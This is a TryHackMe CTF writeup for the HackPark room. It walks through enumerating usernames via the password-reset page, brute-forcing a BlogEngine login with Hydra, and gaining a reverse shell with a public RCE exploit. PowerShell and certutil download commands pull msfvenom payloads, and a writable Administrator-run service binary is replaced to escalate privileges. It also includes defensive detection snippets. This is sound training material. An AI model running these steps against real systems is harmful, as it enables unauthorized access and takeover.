HackPark : TryHackMe Writeup

0liverFlow
9 min read, Dec 9, 2023


HackPark is an interesting and fairly challenging room in which you compromise a Windows machine by brute-forcing a login page, exploiting a Remote Code Execution (RCE) vulnerability and abusing insecure service file permissions to escalate your privileges.

[Task 1] — Deploy the vulnerable windows machine

What’s the name of the clown displayed on the homepage?

Let’s try to perform a reverse image search from the clown image.

A simple way to do that is to use Google Images:

Google Reverse Image

Once done, you might be able to find the clown’s name.

[Task 2] — Using Hydra to brute-force a login

Setup the hosts file

Let’s first add the target machine’s IP address to the /etc/hosts file.

Nmap Scan

Nmap Scan

-Pn : skips host discovery and treats the host as up. This is handy when a target does not reply to ICMP probes.

-A : shorthand option that enables OS detection, version detection, script scanning and traceroute.

-p- : scans all 65535 TCP ports

-T4 : selects the aggressive timing template, which speeds up the scan

-oN : writes normal (human-readable) output to the given file

Directory/File Enumeration

Knowing that the target is running a web server, let’s perform a directory/file enumeration using Gobuster:

Intercepting HTTP Login Request

Here, we are going to use Burp Proxy to intercept the HTTP request.

Intercepting the HTTP request with Burp Proxy

We need to find a login page to attack and identify what type of request the form is making to the web server. Typically, a form makes one of two kinds of request: a GET request, which is used to request data from a web server, and a POST request, which is used to send data to a server.

You can check what request a form is making by right-clicking on the login form, inspecting the element and then reading the value of the method attribute. You can also identify this if you are intercepting the traffic through Burp Suite (other HTTP methods can be found here).

What request type is the Windows website login form using?

Brute-Force Attack

Now we know the request type and have a URL for the login form, we can get started brute-forcing an account.

Run the following command but fill in the blanks:

hydra -l <username> -P /usr/share/wordlists/<wordlist>/ IP http-post-form

Before performing the dictionary attack, we need to find a valid username.

We can see that our target is running BlogEngine, which is an open source blogging platform.

Let’s check whether we can find the default credentials used by a blog powered by BlogEngine:

Fantastic! According to the website, the default credentials to login to the administration panel are admin:admin.

Let’s check this out:

Login attempt using default credentials

Unfortunately, the login attempt failed. This most likely means that the administrator changed the default password.

Nevertheless, we can exploit the password reset feature to enumerate valid usernames. This is done by monitoring the reset error message.

Here’s how it works:

Well, we got the error message “User not found” when trying to use the username guest.

What if we use the default username admin?

Wonderful! We got a message different from “User not found” which probably means that the user admin is valid.

FYI, this process could have been automated using Burp Suite as follows:

1. Intercept the request with Burp Proxy.

2. Send the intercepted request to Intruder (Ctrl+I):

Payload selection

3. Run a Sniper attack against the password-reset page:

Sniper attack

One thing that directly caught my eye after completing the attack was the difference between the response length of the admin payload (4442) and the other payloads (377x).

Based on that, we can say that the admin username is probably valid.
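The oracle used above is the response itself: a distinct "User not found" message and a visibly different length for the valid account. The following added example (not code from the writeup or from BlogEngine) models the leaky handler beside a hardened one that answers identically for known and unknown accounts, and includes the check a developer would run against their own reset endpoint. The user store, messages and padding are constructed.

```python
from dataclasses import dataclass

# Constructed account store standing in for the blog's user table.
USERS = {"admin"}


@dataclass(frozen=True)
class Response:
    status: int
    body: str


def reset_vulnerable(username: str) -> Response:
    """Mirrors what the room shows: a distinct 'User not found' error for
    unknown accounts and a much longer confirmation page for known ones."""
    if username not in USERS:
        return Response(200, "<p>User not found</p>")
    # Constructed long page, standing in for the 4442-byte response seen for admin.
    return Response(200, "<p>A reset e-mail has been sent.</p>" + " " * 4000)


def reset_hardened(username: str) -> Response:
    """Same wording and same length whether or not the account exists. The
    lookup still happens, but it only decides whether an e-mail goes out."""
    if username in USERS:
        pass  # send the reset e-mail here; nothing about it reaches the page
    return Response(200, "<p>If that account exists, a reset e-mail has been sent.</p>")


def leaks_user_existence(handler, known: str, unknown: str) -> bool:
    """Defender-side check for a reset endpoint: submit one known and one
    unknown username and report whether status, length or wording differs."""
    a, b = handler(known), handler(unknown)
    return (a.status, len(a.body), a.body) != (b.status, len(b.body), b.body)


if __name__ == "__main__":
    print("vulnerable handler leaks:", leaks_user_existence(reset_vulnerable, "admin", "guest"))
    print("hardened handler leaks:  ", leaks_user_existence(reset_hardened, "admin", "guest"))
```

The same comparison belongs in an integration test so a later change to the error page cannot quietly reintroduce the difference.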

Now that we have a valid username, we can perform our dictionary attack using hydra.

Hydra is a parallelized, fast and flexible login cracker.

Note 📝: Feel free to check this cheat sheet if you want to learn more about Hydra.

Password Guessing attack

Great! Now that we have a valid pair of credentials, let’s log in to the admin account:

Administrator page
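From the other side of the wire, a dictionary attack like the one above is a burst of POSTs to the login page from a single client. This added example (not part of the writeup) runs a sliding-window count over a constructed IIS W3C-style log excerpt; the /login path, timestamps, addresses and User-Agent strings are all made up for the demonstration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed IIS W3C-style excerpt (not captured from the room): two ordinary
# requests from one client, then 25 login POSTs in 25 seconds from another.
# /login stands in for the real login page; field positions come from the
# #Fields header rather than being hard-coded.
LOGIN_PATH = "/login"
SAMPLE_LOG = "\n".join(
    ["#Fields: date time cs-method cs-uri-stem c-ip cs(User-Agent) sc-status",
     "2023-12-09 10:00:00 GET /login 10.10.14.7 Mozilla/5.0 200",
     "2023-12-09 10:00:03 POST /login 10.10.14.7 Mozilla/5.0 302"]
    + [f"2023-12-09 10:00:{i:02d} POST /login 10.10.14.5 Mozilla/4.0+(Hydra) 200"
       for i in range(25)]
)

def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def detect_login_bruteforce(text, login_path=LOGIN_PATH, threshold=10,
                            window=timedelta(seconds=60)):
    """Return {client_ip: peak_count} for clients that POSTed to the login page
    more than `threshold` times inside any `window`-long sliding interval.
    Status codes are ignored on purpose: many forms answer 200 to a failed
    login, which is why hydra matches on a failure string rather than on status."""
    recent = defaultdict(deque)
    flagged = {}
    for e in parse_w3c(text):
        if e["cs-method"] != "POST" or e["cs-uri-stem"] != login_path:
            continue
        ts = datetime.strptime(f"{e['date']} {e['time']}", "%Y-%m-%d %H:%M:%S")
        q = recent[e["c-ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold:
            flagged[e["c-ip"]] = max(flagged.get(e["c-ip"], 0), len(q))
    return flagged

if __name__ == "__main__":
    for ip, n in detect_login_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {n} login POSTs inside one 60 s window")
```

Account lockout or rate limiting on the login form is what actually stops the attack; the log check only tells you it happened.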

[Task 3] — Compromise the machine

Now you have logged into the website, are you able to identify the version of BlogEngine?

BlogEngine version

After finding the BlogEngine’s version, we can use searchsploit to research exploits related to that version.

For that, we only need to execute the following command:

searchsploit BlogEngine <version>

Use the exploit database archive to find an exploit to gain a reverse shell on this system.

What is the CVE ?

CVE-xxxx-xxxx

Using the public exploit, gain initial access to the server.

Who is the webserver running as ?

Once you download the right exploit, make sure to read all the instructions in order to understand how to use it.

Then you need to set up your netcat listener and run the exploit to obtain the reverse shell:

Initial Access obtained

[Task 4] — Windows Privilege Escalation

In this task we will learn about the basics of Windows Privilege Escalation.

First we will pivot from netcat to a meterpreter session and use this to enumerate the machine to identify potential vulnerabilities. We will then use this gathered information to exploit the system and become the Administrator.

Our netcat session is a little unstable, so let’s generate another reverse shell using msfvenom.

Before generating the reverse shell, we first need to find the architecture of the target’s OS. For that, we can execute the following command:

wmic OS get OSArchitecture

OS Architecture
Generating a payload using msfvenom
Python Listener

After setting up our Python listener, we can download the reverse shell onto the target computer using PowerShell:

powershell -c "Invoke-WebRequest -Uri URL -OutFile FILENAME"

Downloading the reverse shell on the target machine

Generally speaking, files downloaded onto the target system are placed in C:\Windows\Temp, which is a temporary directory.

Once done, let’s run a handler using msfconsole:

Setting up a handler
Executing the reverse shell on the target machine
Meterpreter session opened

What is the OS version of this windows machine?

We can use the sysinfo meterpreter command to get information about the remote system, such as the OS version.

What is the name of the abnormal service running?

Here, we are going to download winPEAS, then execute it on the target machine.

winPEAS is a great tool that enumerates the system and points out potential vulnerabilities that we can exploit. The part we are most interested in for this room is the running processes and services!

Uploading winPEAS on the target system
winPEAS Execution
Local users information
Services information

What is the name of the binary you’re supposed to exploit?

Abnormal service logs

Using this abnormal service, escalate your privileges!

Note 📝: As you can see in the figure above, the binary of the abnormal service is run every 30 seconds by the Administrator user.

What is the user flag (on Jeffs Desktop)?

To retrieve the user flag, we are first going to replace the binary of the abnormal service with our reverse shell payload, giving our payload the same name as the exploitable binary.

If you don’t give your reverse shell payload the same name as the exploitable binary, it will not be executed.

Once done, we need to run our handler and then wait for the meterpreter session to be established.

Setting up the handler

After a few seconds, we get our meterpreter session.

This is a privileged session because our payload has been executed by the Administrator user.

That’s it, we can now retrieve the user and the root flags.

What is the root flag?
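The root cause of this escalation is a service binary that a low-privileged user is allowed to overwrite while Administrator keeps executing it. This added example (not code from the writeup or from winPEAS) is the defender-side audit: it parses icacls output collected for the service binaries and reports any file whose ACL grants write-capable rights to Users, Everyone or Authenticated Users. The icacls listing, paths and binary names are constructed placeholders, and the parser assumes the usual icacls layout of one path followed by indented ACEs.

```python
import re

# Constructed icacls-style output (not captured from the room) for two service
# binaries: one with a sane ACL, one where BUILTIN\Users hold Full control.
# Paths and binary names are placeholders, not the room's real values.
SAMPLE_ICACLS = r"""
C:\Program Files\GoodSvc\goodsvc.exe NT AUTHORITY\SYSTEM:(I)(F)
                                     BUILTIN\Administrators:(I)(F)
                                     BUILTIN\Users:(I)(RX)
C:\Program Files\BadSvc\badsvc.exe BUILTIN\Users:(F)
                                   BUILTIN\Administrators:(F)
Successfully processed 2 files; Failed processing 0 files
"""

# An ACE reads "<principal>:(right)(right)..."; principals may contain spaces.
ACE = (r"(?P<principal>Everyone|(?:NT AUTHORITY|NT SERVICE|[^\s\\:]+)\\[^:\\]+)"
       r":(?P<rights>(?:\([^)]*\))+)$")
FIRST = re.compile(r"^(?P<path>[A-Za-z]:\\.+?) " + ACE)  # file path + its first ACE
CONT = re.compile(r"^\s+" + ACE)                         # remaining ACEs, indented
LOW_PRIV = {r"BUILTIN\Users", "Everyone", r"NT AUTHORITY\Authenticated Users"}
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}  # enough to replace a file

def parse_icacls(text):
    """Yield (path, principal, rights) for every ACE in collected icacls output."""
    path = None
    for line in text.splitlines():
        m = FIRST.match(line) or CONT.match(line)
        if not m:
            continue  # blank lines and the trailing summary line
        if m.re is FIRST:
            path = m.group("path")
        rights = {r for grp in re.findall(r"\(([^)]*)\)", m.group("rights"))
                  for r in grp.split(",")}
        yield path, m.group("principal"), rights

def writable_by_low_priv(text):
    """Map each file a low-privileged principal could overwrite to those
    principals. When that file is the binary a service runs as Administrator
    every 30 seconds, as in this room, replacing it yields an Administrator shell."""
    hits = {}
    for path, principal, rights in parse_icacls(text):
        if principal in LOW_PRIV and rights & WRITE_RIGHTS:
            hits.setdefault(path, []).append(principal)
    return hits

if __name__ == "__main__":
    for path, who in writable_by_low_priv(SAMPLE_ICACLS).items():
        print(f"writable by {', '.join(who)}: {path}")
```

The fix is to restrict write access on the binary and its directory to Administrators and SYSTEM; the same check applied to the service's directory catches the unquoted-path and DLL-drop variants of the problem.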

[Task 5] — Privilege Escalation Without Metasploit

In this task we will escalate our privileges without the use of meterpreter/metasploit!

Firstly, we will pivot from our netcat session that we have established, to a more stable reverse shell.

Once we have established this we will use winPEAS to enumerate the system for potential vulnerabilities, before using this information to escalate to Administrator.

Now we can generate a more stable shell using msfvenom instead of a meterpreter. This time, let’s set our payload to windows/shell_reverse_tcp.

Generating the payload
Downloading the payload on the target system

Here, I used certutil instead of the PowerShell Invoke-WebRequest command just to show you another way to do it.

Executing the reverse shell payload on the target system
Obtaining the reverse shell

Now that you know how to pull files from your machine onto the victim’s machine, we can pull winPEAS.bat onto the system using the same method! (You can find winPEAS here.)

Using winPeas, what was the Original Install time? (This is date and time)

Downloading winPEAS & setting up a Python server
Downloading winPEAS on the target system
winPEAS execution

Since I was not able to find the original install time using winPEAS, I finally used the built-in systeminfo command:

Original Install Date
Mission Complete

Wrapping Up

To connect the dots, this was quite a challenging room but a fun one at the same time. We explored lots of techniques, from initial access to the privilege escalation stage, using various tools.

That’s it! Do not forget to click on the little clap icon below if you enjoyed the content and to subscribe to my newsletter to keep up with my latest articles.

Resources

https://images.google.com/

https://blogengine.io/docs/get-started/

https://www.exploit-db.com/

https://github.com/carlospolop/PEASS-ng/releases/tag/20231203-9cdcb38f

Contact

GitHub : https://github.com/0liverFlow
